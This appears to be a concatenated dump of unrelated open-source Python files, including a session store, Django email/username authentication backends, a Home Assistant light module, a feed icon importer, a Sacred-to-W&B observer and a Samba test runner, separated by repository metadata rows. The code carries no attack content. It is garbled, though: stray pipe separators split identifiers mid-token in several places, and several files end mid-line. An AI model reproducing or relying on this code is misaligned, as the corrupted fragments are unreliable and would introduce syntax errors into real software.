"""
def __init__(self, session_class=Session):
SessionStore.__init__(self, session_class)
def save(self, session):
"""
Updates the session
"""
current_app.cache.set(
session.sid, dict(session), 30 * 24 * 60 * 60
)
def delete(self, session):
"""
Deletes the session
"""
current_app.cache.delete(session.sid)
def get(self, sid):
"""
Returns session
"""
if not self.is_valid_key(sid):
return self.new()
session_data = current_app.cache.get(sid)
if session_data is None:
session_data = {}
return self.session_class(session_data, sid, False)
def list(self):
"""
Lists all sessions in the store
"""
raise Exception("Not implemented yet")
class NereidSessionInterface(SessionInterface):
"""Session Management Class"""
session_store = MemcachedSessionStore()
null_session_class = NullSession
def open_session(self, app, request):
"""
Creates or opens a new session.
:param request: an instance of :attr:`request_class`.
"""
sid = request.cookies.get(app.session_cookie_name, None)
if sid:
return self.session_store.get(sid)
else:
return self.session_store.new()
def save_session(self, app, session, response):
"""
Saves the session if it needs updates. For the default
implementation, check :meth:`open_session`.
:param session: the session to be saved
:param response: an instance of :attr:`response_class`
"""
if session.should_save:
self.session_store.save(session)
expires = self.get_expiration_time(app, session)
domain = self.get_cookie_domain(app)
from nereid.globals import request
sid = request.cookies.get(app.session_cookie_name, None)
if session.sid != sid:
# The only information in the session is the sid, and the
# only reason why a cookie should be set again is if that
# has changed
response.set_cookie(
app.session_cookie_name, session.sid,
expires=expires, httponly=False, domain=domain
)
|
ntucker/django-user-accounts | account/auth_backends.py | Python | mit | 2,826 | 0.004954 | from __future__ import unicode_literals
import re
from django.db.models import Q
from django.contrib.auth import get_user_model
from django.contrib.auth.backends import ModelBackend
from account.models import EmailAddress
from account.utils import get_user_lookup_kwargs
email_re = re.compile(
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*" # dot-atom
# quoted-string, see also http://tools.ietf.org/html/rfc2822#section-3.2.5
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-\011\013\014\016-\177])*"'
r')@((?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)$)' # domain
r'|\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$', re.IGNORECASE) # literal form, ipv4 address (SMTP 4.1.3)
class UsernameAuthenticationBackend(ModelBackend):
def authenticate(self, **credentials):
User = get_user_model()
lookup_kwargs = get_user_lookup_kwargs({
"{username}__iexact": credentials["username"]
})
try:
| user = User.objects.get(**lookup_kwargs)
except (User.DoesNotExist, KeyError):
return None
else:
try:
if user.check_password(credentials["password"]):
return user
except KeyError:
return None
class EmailAuthenticationBackend(ModelBackend):
def authenticate(self, **credentials):
qs = EmailAddress.objects.filter(Q(primary=True) | Q(verified=True))
try:
e | mail_address = qs.get(email__iexact=credentials["username"])
except (EmailAddress.DoesNotExist, KeyError):
return None
else:
user = email_address.user
try:
if user.check_password(credentials["password"]):
return user
except KeyError:
return None
class HybridAuthenticationBackend(ModelBackend):
"""User can login via email OR username"""
def authenticate(self, **credentials):
User = get_user_model()
if email_re.search(credentials["username"]):
qs = EmailAddress.objects.filter(Q(primary=True) | Q(verified=True))
            try:
                email_address = qs.get(email__iexact=credentials["username"])
            except (EmailAddress.DoesNotExist, KeyError):
                return None
            else:
                user = email_address.user
else:
lookup_kwargs = get_user_lookup_kwargs({
"{username}__iexact": credentials["username"]
})
            try:
                user = User.objects.get(**lookup_kwargs)
            except (User.DoesNotExist, KeyError):
                return None
try:
if user.check_password(credentials["password"]):
return user
except KeyError:
return None
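# Illustrative Django settings wiring for these backends (added commentary, not
# part of the original module); the dotted paths assume the file lives at
# account/auth_backends.py as stated in the row header above:
#   AUTHENTICATION_BACKENDS = [
#       "account.auth_backends.HybridAuthenticationBackend",
#       "django.contrib.auth.backends.ModelBackend",
#   ]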
|
sander76/home-assistant | homeassistant/components/light/__init__.py | Python | apache-2.0 | 36,404 | 0.001209 | """Provides functionality to interact with lights."""
from __future__ import annotations
from collections.abc import Iterable
import csv
import dataclasses
from datetime import timedelta
import logging
import os
from typing import cast, final
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ON,
)
from homeassistant.core import HomeAssistant, HomeAssistantError, callback
from homeassistant.helpers import config_validation as cv, entity_registry as er
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
make_entity_service_schema,
)
from homeassistant.helpers.entity import ToggleEntity, ToggleEntityDescription
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.loader import bind_hass
import homeassistant.util.color as color_util
# mypy: allow-untyped-defs, no-check-untyped-defs
DOMAIN = "light"
SCAN_INTERVAL = timedelta(seconds=30)
DATA_PROFILES = "light_profiles"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
# Bitfield of features supported by the light entity
SUPPORT_BRIGHTNESS = 1 # Deprecated, replaced by color modes
SUPPORT_COLOR_TEMP = 2 # Deprecated, replaced by color modes
SUPPORT_EFFECT = 4
SUPPORT_FLASH = 8
SUPPORT_COLOR = 16 # Deprecated, replaced by color modes
SUPPORT_TRANSITION = 32
SUPPORT_WHITE_VALUE = 128 # Deprecated, replaced by color modes
# Color mode of the light
ATTR_COLOR_MODE = "color_mode"
# List of color modes supported by the light
ATTR_SUPPORTED_COLOR_MODES = "supported_color_modes"
# Possible color modes
COLOR_MODE_UNKNOWN = "unknown" # Ambiguous color mode
COLOR_MODE_ONOFF = "onoff" # Must be the only supported mode
COLOR_MODE_BRIGHTNESS = "brightness" # Must be the only supported mode
COLOR_MODE_COLOR_TEMP = "color_temp"
COLOR_MODE_HS = "hs"
COLOR_MODE_XY = "xy"
COLOR_MODE_RGB = "rgb"
COLOR_MODE_RGBW = "rgbw"
COLOR_MODE_RGBWW = "rgbww"
COLOR_MODE_WHITE = "white" # Must *NOT* be the only supported mode
VALID_COLOR_MODES = {
COLOR_MODE_ONOFF,
COLOR_MODE_BRIGHTNESS,
COLOR_MODE_COLOR_TEMP,
COLOR_MODE_HS,
COLOR_MODE_XY,
COLOR_MODE_RGB,
COLOR_MODE_RGBW,
COLOR_MODE_RGBWW,
COLOR_MODE_WHITE,
}
COLOR_MODES_BRIGHTNESS = VALID_COLOR_MODES - {COLOR_MODE_ONOFF}
COLOR_MODES_COLOR = {
COLOR_MODE_HS,
COLOR_MODE_RGB,
COLOR_MODE_RGBW,
COLOR_MODE_RGBWW,
COLOR_MODE_XY,
}
def valid_supported_color_modes(color_modes: Iterable[str]) -> set[str]:
"""Validate the given color modes."""
color_modes = set(color_modes)
if (
not color_modes
or COLOR_MODE_UNKNOWN in color_modes
or (COLOR_MODE_BRIGHTNESS in color_modes and len(color_modes) > 1)
or (COLOR_MODE_ONOFF in color_modes and len(color_modes) > 1)
or (COLOR_MODE_WHITE in color_modes and not color_supported(color_modes))
):
raise vol.Error(f"Invalid supported_color_modes {sorted(color_modes)}")
return color_modes
def brightness_supported(color_modes: Iterable[str] | None) -> bool:
"""Test if brightness is supported."""
if not color_modes:
return False
return any(mode in COLOR_MODES_BRIGHTNESS for mode in color_modes)
def color_supported(color_modes: Iterable[str] | None) -> bool:
"""Test if color is supported."""
if not color_modes:
return False
return any(mode in COLOR_MODES_COLOR for mode in color_modes)
def color_temp_supported(color_modes: Iterable[str] | None) -> bool:
"""Test if color temperature is supported."""
if not color_modes:
return False
return COLOR_MODE_COLOR_TEMP in color_modes
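# Worked examples for the helpers above (added commentary, not part of the
# original module), derived from the VALID_COLOR_MODES sets defined earlier:
#   brightness_supported({COLOR_MODE_ONOFF})       -> False  (onoff is excluded)
#   brightness_supported({COLOR_MODE_HS})          -> True
#   color_supported({COLOR_MODE_COLOR_TEMP})       -> False  (color temp is not a color mode)
#   color_temp_supported({COLOR_MODE_COLOR_TEMP})  -> True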
def get_supported_color_modes(hass: HomeAssistant, entity_id: str) -> set | None:
"""Get supported color modes for a light entity.
First try the statemachine, then entity registry.
This is the equivalent of entity helper get_supported_features.
"""
state = hass.states.get(entity_id)
if state:
return state.attributes.get(ATTR_SUPPORTED_COLOR_MODES)
entity_registry = er.async_get(hass)
entry = entity_registry.async_get(entity_id)
if not entry:
raise HomeAssistantError(f"Unknown entity {entity_id}")
if not entry.capabilities:
return None
return entry.capabilities.get(ATTR_SUPPORTED_COLOR_MODES)
# Float that represents transition time in seconds to make change.
ATTR_TRANSITION = "transition"
# Lists holding color values
ATTR_RGB_COLOR = "rgb_color"
ATTR_RGBW_COLOR = "rgbw_color"
ATTR_RGBWW_COLOR = "rgbww_color"
ATTR_XY_COLOR = "xy_color"
ATTR_HS_COLOR = "hs_color"
ATTR_COLOR_TEMP = "color_temp"
ATTR_KELVIN = "kelvin"
ATTR_MIN_MIREDS = "min_mireds"
ATTR_MAX_MIREDS = "max_mireds"
ATTR_COLOR_NAME = "color_name"
ATTR_WHITE_VALUE = "white_value"
ATTR_WHITE = "white"
# Brightness of the light, 0..255 or percentage
ATTR_BRIGHTNESS = "brightness"
ATTR_BRIGHTNESS_PCT = "brightness_pct"
ATTR_BRIGHTNESS_STEP = "brightness_step"
ATTR_BRIGHTNESS_STEP_PCT = "brightness_step_pct"
# String representing a profile (built-in ones or external defined).
ATTR_PROFILE = "profile"
# If the light should flash, can be FLASH_SHORT or FLASH_LONG.
ATTR_FLASH = "flash"
FLASH_SHORT = "short"
FLASH_LONG = "long"
# List of possible effects
ATTR_EFFECT_LIST = "effect_list"
# Apply an effect to the light, can be EFFECT_COLORLOOP.
ATTR_EFFECT = "effect"
EFFECT_COLORLOOP = "colorloop"
EFFECT_RANDOM = "random"
EFFECT_WHITE = "white"
COLOR_GROUP = "Color descriptors"
LIGHT_PROFILES_FILE = "light_profiles.csv"
# Service call validation schemas
VALID_TRANSITION = vol.All(vol.Coerce(float), vol.Clamp(min=0, max=6553))
VALID_BRIGHTNESS = vol.All(vol.Coerce(int), vol.Clamp(min=0, max=255))
VALID_BRIGHTNESS_PCT = vol.All(vol.Coerce(float), vol.Range(min=0, max=100))
VALID_BRIGHTNESS_STEP = vol.All(vol.Coerce(int), vol.Clamp(min=-255, max=255))
VALID_BRIGHTNESS_STEP_PCT = vol.All(vol.Coerce(float), vol.Clamp(min=-100, max=100))
VALID_FLASH = vol.In([FLASH_SHORT, FLASH_LONG])
LIGHT_TURN_ON_SCHEMA = {
vol.Exclusive(ATTR_PROFILE, COLOR_GROUP): cv.string,
ATTR_TRANSITION: VALID_TRANSITION,
vol.Exclusive(ATTR_BRIGHTNESS, ATTR_BRIGHTNESS): VALID_BRIGHTNESS,
vol.Exclusive(ATTR_BRIGHTNESS_PCT, ATTR_BRIGHTNESS): VALID_BRIGHTNESS_PCT,
vol.Exclusive(ATTR_BRIGHTNESS_STEP, ATTR_BRIGHTNESS): VALID_BRIGHTNESS_STEP,
vol.Exclusive(ATTR_BRIGHTNESS_STEP_PCT, ATTR_BRIGHTNESS): VALID_BRIGHTNESS_STEP_PCT,
vol.Exclusive(ATTR_COLOR_NAME, COLOR_GROUP): cv.string,
vol.Exclusive(ATTR_COLOR_TEMP, COLOR_GROUP): vol.All(
vol.Coerce(int), vol.Range(min=1)
),
vol.Exclusive(ATTR_KELVIN, COLOR_GROUP): cv.positive_int,
vol.Exclusive(ATTR_HS_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence(
(
vol.All(vol.Coerce(float), vol.Range(min=0, max=360)),
vol.All(vol.Coerce(float), vol.Range(min=0, max=100)),
)
),
vol.Coerce(tuple),
),
vol.Exclusive(ATTR_RGB_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence((cv.byte,) * 3), vol.Coerce(tuple)
),
vol.Exclusive(ATTR_RGBW_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence((cv.byte,) * 4), vol.Coerce(tuple)
),
vol.Exclusive(ATTR_RGBWW_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence((cv.byte,) * 5), vol.Coerce(tuple)
),
vol.Exclusive(ATTR_XY_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence((cv.small_float, cv.small_float)), vol.Coerce(tuple)
),
vol.Exclusive(ATTR_WHITE, COLOR_GROUP): VALID_BRIGHTNESS,
ATTR_WHITE_VALUE: vol.All(vo | l.Coerce(int), vol.Range(min=0, max=255)),
ATTR_FLASH: VALID_FLASH,
ATTR_EFFECT: cv.string,
}
LIGHT_TURN_OFF_SCHEMA = {ATTR_TRANSITION: VALID_TR | ANSITION, ATTR_FLASH: VALID_FLASH}
_LOGGER = logging.getLogger(__name__)
@bind_hass
def is_on(hass: HomeAssistant, entity_id: str) -> bool:
"""Return if the lights are on based on the statemachine."""
return hass.states.is_state(entity_id, STATE_ON)
def preprocess_turn_on_alternatives(hass, params):
"""Process extra data for turn l |
mihaip/NewsBlur | apps/rss_feeds/icon_importer.py | Python | mit | 13,810 | 0.001593 | import urllib2
import lxml.html
import numpy
import scipy
import scipy.misc
import scipy.cluster
import urlparse
import struct
import operator
import gzip
import datetime
import requests
import httplib
from PIL import BmpImagePlugin, PngImagePlugin, Image
from socket import error as SocketError
from boto.s3.key import Key
from StringIO import StringIO
from django.conf import settings
from apps.rss_feeds.models import MFeedPage, MFeedIcon
from utils import log as logging
from utils.feed_functions import timelimit, TimeoutError
from OpenSSL.SSL import Error as OpenSSLError
from pyasn1.error import PyAsn1Error
from requests.packages.urllib3.exceptions import LocationParseError
class IconImporter(object):
def __init__(self, feed, page_data=None, force=False):
self.feed = feed
self.force = force
self.page_data = page_data
self.feed_icon = MFeedIcon.get_feed(feed_id=self.feed.pk)
def save(self):
if not self.force and self.feed.favicon_not_found:
# print 'Not found, skipping...'
return
if (
not self.force
and not self.feed.favicon_not_found
and self.feed_icon.icon_url
and self.feed.s3_icon
):
# print 'Found, but skipping...'
return
image, image_file, icon_url = self.fetch_image_from_page_data()
if not image:
image, image_file, icon_url = self.fetch_image_from_path(force=self.force)
if image:
image = self.normalize_image(image)
try:
color = self.determine_dominant_color_in_image(image)
except IndexError:
return
try:
image_str = self.string_from_image(image)
except TypeError:
return
if len(image_str) > 500000:
image = None
if (image and
(self.force or
self.feed_icon.data != image_str or
self.feed_icon.icon_url != icon_url or
self.feed_icon.not_found or
(settings.BACKED_BY_AWS.get('icons_on_s3') and not self.feed.s3_icon))):
logging.debug(" ---> [%-30s] ~SN~FBIcon difference:~FY color:%s (%s/%s) data:%s url:%s notfound:%s no-s3:%s" % (
self.feed.log_title[:30],
self.feed_icon.color != color, self.feed_icon.color, color,
self.feed_icon.data != image_str,
self.feed_icon.icon_url != icon_url,
self.feed_icon.not_found,
settings.BACKED_BY_AWS.get('icons_on_s3') and not self.feed.s3_icon))
self.feed_icon.data = image_str
self.feed_icon.icon_url = icon_url
self.feed_icon.color = color
self.feed_icon.not_found = False
self.feed_icon.save()
if settings.BACKED_BY_AWS.get('icons_on_s3'):
self.save_to_s3(image_str)
if self.feed.favicon_color != color:
self.feed.favicon_color = color
self.feed.favicon_not_found = False
self.feed.save(update_fields=['favicon_color', 'favicon_not_found'])
if not image:
self.feed_icon.not_found = True
self.feed_icon.save()
self.feed.favicon_not_found = True
self.feed.save()
return not self.feed.favicon_not_found
def save_to_s3(self, image_str):
expires = datetime.datetime.now() + datetime.timedelta(days=60)
expires = expires.strftime("%a, %d %b %Y %H:%M:%S GMT")
k = Key(settings.S3_CONN.get_bucket(settings.S3_ICONS_BUCKET_NAME))
k.key = self.feed.s3_icons_key
k.set_metadata('Content-Type', 'image/png')
k.set_metadata('Expires', expires)
k.set_contents_from_string(image_str.decode('base64'))
k.set_acl('public-read')
self.feed.s3_icon = True
self.feed.save()
def load_icon(self, image_file, index=None):
'''
DEPRECATED
Load Windows ICO image.
See http://en.wikipedia.org/w/index.php?oldid=264332061 for file format
description.
Cribbed and modified from http://djangosnippets.org/snippets/1287/
'''
try:
image_file.seek(0)
header = struct.unpack('<3H', image_file.read(6))
except Exception, e:
return
# Check magic
if header[:2] != (0, 1):
return
# Collect icon directories
directories = []
for i in xrange(header[2]):
directory = list(struct.unpack('<4B2H2I', image_file.read(16)))
for j in xrange(3):
if not directory[j]:
directory[j] = 256
directories.append(directory)
if index is None:
# Select best icon
directory = max(directories, key=operator.itemgetter(slice(0, 3)))
else:
directory = directories[in | dex]
# Seek to the bitmap data
image_file.seek(directory[7])
prefix = image_file.read(16)
image_file.seek(-16, 1)
if PngImagePlugin._accept(prefix):
# Windows Vista icon with PNG inside
try:
image = PngImagePlugin.PngImageFile(image_file)
exce | pt IOError:
return
else:
# Load XOR bitmap
try:
image = BmpImagePlugin.DibImageFile(image_file)
except IOError:
return
if image.mode == 'RGBA':
# Windows XP 32-bit color depth icon without AND bitmap
pass
else:
# Patch up the bitmap height
image.size = image.size[0], image.size[1] >> 1
d, e, o, a = image.tile[0]
image.tile[0] = d, (0, 0) + image.size, o, a
# Calculate AND bitmap dimensions. See
# http://en.wikipedia.org/w/index.php?oldid=264236948#Pixel_storage
# for description
offset = o + a[1] * image.size[1]
stride = ((image.size[0] + 31) >> 5) << 2
size = stride * image.size[1]
# Load AND bitmap
image_file.seek(offset)
string = image_file.read(size)
mask = Image.frombytes('1', image.size, string, 'raw',
('1;I', stride, -1))
image = image.convert('RGBA')
image.putalpha(mask)
return image
def fetch_image_from_page_data(self):
image = None
image_file = None
if self.page_data:
content = self.page_data
elif settings.BACKED_BY_AWS.get('pages_on_s3') and self.feed.s3_page:
key = settings.S3_CONN.get_bucket(settings.S3_PAGES_BUCKET_NAME).get_key(self.feed.s3_pages_key)
compressed_content = key.get_contents_as_string()
stream = StringIO(compressed_content)
gz = gzip.GzipFile(fileobj=stream)
try:
content = gz.read()
except IOError:
content = None
else:
content = MFeedPage.get_data(feed_id=self.feed.pk)
url = self._url_from_html(content)
if not url:
try:
content = requests.get(self.cleaned_feed_link).content
url = self._url_from_html(content)
except (AttributeError, SocketError, requests.ConnectionError,
requests.models.MissingSchema, requests.sessions.InvalidSchema,
requests.sessions.TooManyRedirects,
requests.models.InvalidURL,
requests.models.ChunkedEncodingError,
requests.models.ContentDecodingError,
httplib.IncompleteRead,
LocationParseError, OpenSSLError, PyAsn1Error,
ValueError), e:
logging.debug(" ---> ~SN~FRFailed~FY to |
motobyus/moto | module_django/jstest/manage.py | Python | mit | 804 | 0 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os | .environ.setdefault("DJANGO_SETTINGS_MODULE", "jstest.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptio | ns on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
mlwbarlow/scripts-as-required | python/TypeSubjectFromRIFCS.py | Python | gpl-2.0 | 1,871 | 0.005879 | # TypeSubjectFromRIFCS.py takes input xml in RIFCS format and outputs subjectType and subjectText to .csv file per line as:
# subjectType|subjectText
#
#
#Usage: TypeSubjectFromRIFCS.py [options] arg1
#
#Options:
# -h, --help show this help message and exit
# --input_xml=INPUT_XML
# e.g ExampleRIFCS.xml - xml in RIFCS format
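#
# Example invocation (illustrative, added commentary): with an input file named
# ExampleRIFCS.xml in the working directory,
#   python TypeSubjectFromRIFCS.py --input_xml=ExampleRIFCS.xml
# appends one "subjectType|subjectText" line per <subject> element to
# output/Subjects.csv, e.g. "anzsrc-for|Applied Mathematics".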
import os
import string
from types import *
from optparse import OptionParser
from xml.etree import ElementTree as ET
from xml.etree.ElementTree import parse
def openFile(fileName, mode):
file = open(("output/"+fileName), mode)
if file is None:
print("Unable to open file %s for %s" % (fileName, mode))
os.sys.ex | it(-1)
print("Opened file %s for %s" % (fileName, mode)) |
return file
usage = "usage: %prog [options] arg1"
parser = OptionParser(usage=usage)
parser.add_option("--input_xml", action="store", dest="input_xml", help="e.g ExampleRIFCS.xml - xml in RIFCS format")
(options, args) = parser.parse_args()
# Validate options
if not options.input_xml:
parser.error("Requires input_xml. Try --help for usage")
    os.sys.exit(-1)
assert(options.input_xml.count(".") > 0) # expect a . in a file name
outputFileName = ("Subjects.csv")
outputCSV_FILE = openFile(outputFileName, "w")
elementTree = ET.parse(options.input_xml)
assert(elementTree is not None)
namespace = "{http://ands.org.au/standards/rif-cs/registryObjects}"
#allSubjects = elementTree.findall('.//{0}subject'.format(namespace))
allSubjects = list(elementTree.iterfind('.//{0}subject'.format(namespace)))
assert(len(allSubjects) > 0)
for subject in allSubjects:
print("%s|%s" % (subject.get("type", ""), subject.text))
outputCSV_FILE.write("%s|%s\n" % (subject.get("type", ""), subject.text))
outputCSV_FILE.close()
print("See output//%s for output" % outputFileName)
|
wandb/client | wandb/integration/sacred/__init__.py | Python | mit | 5,783 | 0.002959 | import warnings
import numpy
from sacred.dependencies import get_digest
from sacred.observers import RunObserver
import wandb
class WandbObserver(RunObserver):
"""Logs sacred experiment data to W&B.
Arguments:
Accepts all the arguments accepted by wandb.init()
name — A display name for this run, which shows up in the UI and is editable, doesn't have to be unique
notes — A multiline string description associated with the run
config — a dictionary-like object to set as initial config
project — the name of the project to which this run will belong
tags — a list of strings to associate with this run as tags
dir — the path to a directory where artifacts will be written (default: ./wandb)
entity — the team posting this run (default: your username or your default team)
job_type — the type of job you are logging, e.g. eval, worker, ps (default: training)
save_code — save the main python or notebook file to wandb to enable diffing (default: editable from your settings page)
group — a string by which to group other runs; see Grouping
reinit — whether to allow multiple calls to wandb.init in the same process (default: False)
id — A unique ID for this run primarily used for Resuming. It must be globally unique, and if you delete a run you can't reuse the ID. Use the name field for a descriptive, useful name for the run. The ID cannot contain special characters.
resume — if set to True, the run auto resumes; can also be a unique string for manual resuming; see Resuming (default: False)
anonymous — can be "allow", "never", or "must". This enables or explicitly disables anonymous logging. (default: never)
force — whether to force a user to be logged into wandb when running a script (default: False)
magic — (bool, dict, or str, optional): magic configuration as bool, dict, json string, yaml filename. If set to True will attempt to auto-instrument your script. (default: None)
sync_tensorboard — A boolean indicating whether or not copy all TensorBoard logs wandb; see Tensorboard (default: False)
monitor_gym — A boolean indicating whether or not to log videos generated by OpenAI Gym; see Ray Tune (default: False)
allow_val_change — whether to allow wandb.config values to change, by default we throw | an exception if config values are overwritten. (default: False)
Examples:
Create sacred experiment::
from wandb.sacred import WandbObserver
ex.observers.append(WandbObserver(project='sacred_test',
name='test1'))
@ex.config
def cfg():
C = 1.0
gamma = 0.7
@ex.automain
def run(C, gamma, | _run):
iris = datasets.load_iris()
per = permutation(iris.target.size)
iris.data = iris.data[per]
iris.target = iris.target[per]
clf = svm.SVC(C, 'rbf', gamma=gamma)
clf.fit(iris.data[:90],
iris.target[:90])
return clf.score(iris.data[90:],
iris.target[90:])
"""
def __init__(self, **kwargs):
self.run = wandb.init(**kwargs)
self.resources = {}
def started_event(
self, ex_info, command, host_info, start_time, config, meta_info, _id
):
"""
TODO:
* add the source code file
* add dependencies and metadata
"""
self.__update_config(config)
def completed_event(self, stop_time, result):
if result:
if not isinstance(result, tuple):
result = (
result,
) # transform single result to tuple so that both single & multiple results use same code
for i, r in enumerate(result):
if isinstance(r, float) or isinstance(r, int):
wandb.log({"result_{}".format(i): float(r)})
                elif isinstance(r, dict):
                    wandb.log(r)
                elif isinstance(r, numpy.ndarray):
                    wandb.log({"result_{}".format(i): wandb.Image(r)})
                elif isinstance(r, object):
                    # catch-all branch: isinstance(r, object) is always true,
                    # so it must come after the more specific checks above
                    artifact = wandb.Artifact("result_{}.pkl".format(i), type="result")
                    artifact.add_file(r)
                    self.run.log_artifact(artifact)
else:
warnings.warn(
"logging results does not support type '{}' results. Ignoring this result".format(
type(r)
)
)
def artifact_event(self, name, filename, metadata=None, content_type=None):
if content_type is None:
content_type = "file"
artifact = wandb.Artifact(name, type=content_type)
artifact.add_file(filename)
self.run.log_artifact(artifact)
def resource_event(self, filename):
"""
TODO: Maintain resources list
"""
if filename not in self.resources:
md5 = get_digest(filename)
self.resources[filename] = md5
def log_metrics(self, metrics_by_name, info):
for metric_name, metric_ptr in metrics_by_name.items():
for _step, value in zip(metric_ptr["steps"], metric_ptr["values"]):
if isinstance(value, numpy.ndarray):
wandb.log({metric_name: wandb.Image(value)})
else:
wandb.log({metric_name: value})
def __update_config(self, config):
for k, v in config.items():
self.run.config[k] = v
self.run.config["resources"] = []
|
Zentyal/samba | selftest/run.py | Python | gpl-3.0 | 4,316 | 0.001622 | #!/usr/bin/python -u
# Bootstrap Samba and run a number of tests against it.
# Copyright (C) 2012 Jelmer Vernooij <jelmer@samba.org>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Test command running."""
import datetime
import os
import subprocess
from samba import subunit
from iso8601 import iso8601
import sys
import tempfile
import warnings
# expand strings from %ENV
def expand_environment_strings(s, vars):
# we use a reverse sort so we do the longer ones first
for k in sorted(vars.keys(), reverse=True):
v = vars[k]
s = s.replace("$%s" % k, v)
return s
def expand_command_list(cmd):
if not "$LISTOPT" in cmd:
return None
return cmd.replace("$LISTOPT", "--list")
def expand_command_run(cmd, supports_loadfile, supports_idlist, subtests=None):
"""Expand a test command.
:param cmd: Command to expand
:param supports_loadfile: Whether command supports loadfile
:param supports_idlist: Whether the command supports running specific
subtests
:param subtests: List of subtests to run - None for all subtests
:return: Tuple with command to run and temporary file to remove after
running (or None)
"""
# Generate a file with the individual tests to run, if the
# test runner for this test suite supports it.
if subtests is None:
return (cmd.replace("$LOADLIST", ""), None)
if supports_loadfile:
(fd, listid_file) = tempfile.mkstemp()
f = os.fdopen(fd, 'w')
try:
for test in subtests:
f.write(test+"\n")
finally:
f.close()
return (
cmd.replace("$LOADLIST", "--load-list=%s" % listid_file),
listid_file)
elif supports_idlist:
cmd += " " + " ".join(subtests)
return (cmd, None)
else:
warnings.warn(
"Running subtests requested, but command does not support "
"this.")
return (cmd, None)
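# Illustrative call (added commentary, not part of the original module); the
# command and test ids below are hypothetical:
#   expand_command_run("smbtorture //$SERVER/tmp", supports_loadfile=False,
#                      supports_idlist=True, subtests=["base.delete", "base.mangle"])
# returns ("smbtorture //$SERVER/tmp base.delete base.mangle", None), while a
# loadfile-capable runner instead gets "$LOADLIST" replaced with
# --load-list=<temporary file> and the caller must remove that file afterwards.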
def exported_envvars_str(vars, names):
out = ""
for n in names:
if not n in vars:
continue
out += "%s=%s\n" % (n, vars[n])
return out
def now():
"""Return datetime instance for current time in UTC.
"""
return datetime.datetime.utcnow().replace(tzinfo=iso8601.Utc())
def run_testsuite_command(name, cmd, subunit_ops, env=None, outf=None):
"""Run a testsuite command.
:param name: | Name of the testsuite
:param cmd: Command to run
:param subunit_ops: Subunit ops to use for reporting results
:param env: Environment the test is run in
:param outf: File-like object to write standard out to (defaults to sys.stdout)
:return: Exit code or None if the test failed to run completely
"""
if outf is None:
outf = sys.stdout
subunit_ops.start_testsuite(name)
subunit_ops.progress(None, subunit.PROGRESS_PUSH)
subunit_ops.time(now())
try | :
exitcode = subprocess.call(cmd, shell=True, stdout=outf)
except Exception, e:
subunit_ops.time(now())
subunit_ops.progress(None, subunit.PROGRESS_POP)
subunit_ops.end_testsuite(name, "error", "Unable to run %r: %s" % (cmd, e))
return None
subunit_ops.time(now())
subunit_ops.progress(None, subunit.PROGRESS_POP)
if env is not None:
envlog = env.get_log()
if envlog != "":
outf.write("envlog: %s\n" % envlog)
outf.write("command: %s\n" % cmd)
outf.write("expanded command: %s\n" % expand_environment_strings(cmd, os.environ))
if exitcode == 0:
subunit_ops.end_testsuite(name, "success")
else:
subunit_ops.end_testsuite(name, "failure", "Exit code was %d" % exitcode)
return exitcode
|
open-forcefield-group/openforcefield | openff/toolkit/tests/test_chemicalenvironment.py | Python | mit | 7,356 | 0.001631 | import pytest
from openff.toolkit.typing.chemistry import *
from openff.toolkit.utils.toolkits import OPENEYE_AVAILABLE
# TODO: Evaluate which tests in this file should be moved to test_toolkits
toolkits = []
if OPENEYE_AVAILABLE:
from openff.toolkit.utils.toolkits import OpenEyeToolkitWrapper, RDKitToolkitWrapper
toolkits.append("openeye")
toolkits.append(OpenEyeToolkitWrapper())
else:
from openff.toolkit.utils.toolkits import RDKitToolkitWrapper
toolkits.append("rdkit")
toolkits.append(RDKitToolkitWrapper())
class TestChemicalEnvironments:
def test_createEnvironments(self):
"""
Test all types of ChemicalEnvironment objects with defined atoms and bonds
Each will be tetrahedral carbons connected by ring single bonds
"""
carbon = [["#6"], ["X4"]]
singleBond = [["-"], ["@"]]
atom = AtomChemicalEnvironment("[#6X4:1]", "CT")
bond = BondChemicalEnvironment("[#6X4:1]-[#6X4:2]", "CT-CT")
angle = AngleChemicalEnvironment("[#6X4:1]-[#6X4:2]-[#6X4:3]", "CT-CT-CT")
torsion = TorsionChemicalEnvironment(
"[#6X4:1]-[#6X4:2]-[#6X4:3]-[#6X4:4]", "CT-CT-CT-CT"
)
improper = ImproperChemicalEnvironment(
"[#6X4:1]-[#6X4:2](-[#6X4:3])-[#6X4:4]", "CT-CT(-CT)-CT"
)
@pytest.mark.parametrize(
["smirks", "expected_valence", "expected_chemenv_class"],
[
["[#6](-[#1])-[#8]", None, ChemicalEnvironment],
